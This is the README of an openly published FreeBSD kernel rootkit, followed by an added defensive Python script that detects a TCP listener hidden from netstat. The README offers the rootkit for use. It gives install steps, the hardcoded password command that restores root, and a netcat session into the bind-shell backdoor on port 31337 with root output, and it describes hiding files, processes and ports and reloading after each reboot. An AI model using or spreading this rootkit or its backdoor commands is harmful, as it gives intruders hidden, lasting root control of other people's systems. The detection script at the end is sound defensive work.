
FreeBSD KLD Rootkit for FreeBSD 13. Hides files, hides process, hides port, bind shell backdoor


bluedragonsecurity/bds_freebsd


BDS KLD ROOTKIT

FreeBSD KLD Rootkit for FreeBSD 13. Hide files, hide process, hide port, bind shell backdoor
Developed by : Antonius
Website : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
Twitter : https://twitter.com/bluedragonsec

Features

  • Bind shell on port 31337
  • Bind shell process hiding
  • Hides files with prefix bds
  • Hides bind shell port
  • Privilege escalation with password

Installation


You need root privilege, make and gcc to install this rootkit. To install, type:
./install.sh

Using the Rootkit

Privilege Escalation
Once the rootkit is installed on the system, if you lose root privilege you can regain it by typing:

  /sbin/bds_shell bluedragonsec
  
Running the command above restores root privilege:
robotsoft@robotsoft ~> id
uid=1002(robotsoft) gid=1002(robotsoft) groups=1002(robotsoft),0(wheel),5(operator)
robotsoft@robotsoft ~> /sbin/bds_shell bluedragonsec
root@robotsoft:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@robotsoft:~ # 

Connecting to Bind Shell Backdoor
To connect to the bind shell on a FreeBSD server where this rootkit is installed, use netcat:

nc (server ip) 31337
For example, with the rootkit installed on a FreeBSD server at 192.168.0.141:
root@robotsoft ~# nc 192.168.0.141 31337
FreeBSD robotsoft 13.2-STABLE FreeBSD 13.2-STABLE GENERIC amd64
sh: turning off NDELAY mode
id
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/

Hiding Files and Directories
To hide a file or directory, give its name the prefix bds.

Process Hiding
This rootkit hides the bind shell process from ps.

Port Hiding
This rootkit hides the bind shell port from netstat.
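
For defenders, the behaviour described above (a listener on port 31337 that netstat does not show) can be caught with a cross-view check: a port that completes a TCP handshake but is missing from netstat's LISTEN list is a hidden listener. This is an added example, not part of the bds_freebsd project; the netstat sample is constructed, the function names are hypothetical, and it assumes the hiding affects only netstat's output, as this README states.

```python
import socket

# Constructed sample of FreeBSD `netstat -an -p tcp` output (not from the page).
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 192.168.0.141.22       192.168.0.10.51234     ESTABLISHED
tcp6       0      0 *.22                   *.*                    LISTEN
"""

def listed_listeners(netstat_text):
    """Return the set of TCP ports that netstat reports in LISTEN state."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            port = fields[3].rsplit(".", 1)[-1]  # FreeBSD prints address.port
            if port.isdigit():
                ports.add(int(port))
    return ports

def accepts_connection(host, port, timeout=1.0):
    """True if a TCP handshake to host:port completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def hidden_listeners(netstat_text, ports, host="127.0.0.1", probe=accepts_connection):
    """Ports that answer a connect() but are missing from netstat's LISTEN list."""
    listed = listed_listeners(netstat_text)
    return sorted(p for p in ports if p not in listed and probe(host, p))

if __name__ == "__main__":
    import subprocess
    # Live check on the local host: compare netstat's view with a real connect().
    out = subprocess.run(["netstat", "-an", "-p", "tcp"],
                         capture_output=True, text=True).stdout
    for port in hidden_listeners(out, [31337]):
        print(f"ALERT: port {port} accepts connections but netstat does not list it")
```

Running the same probe from a second host against the server's address gives a view that does not depend on the suspect kernel at all.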

Persistence
The rootkit is activated every time the system starts up. After a reboot, wait 1 minute and the rootkit will be loaded into the kernel.
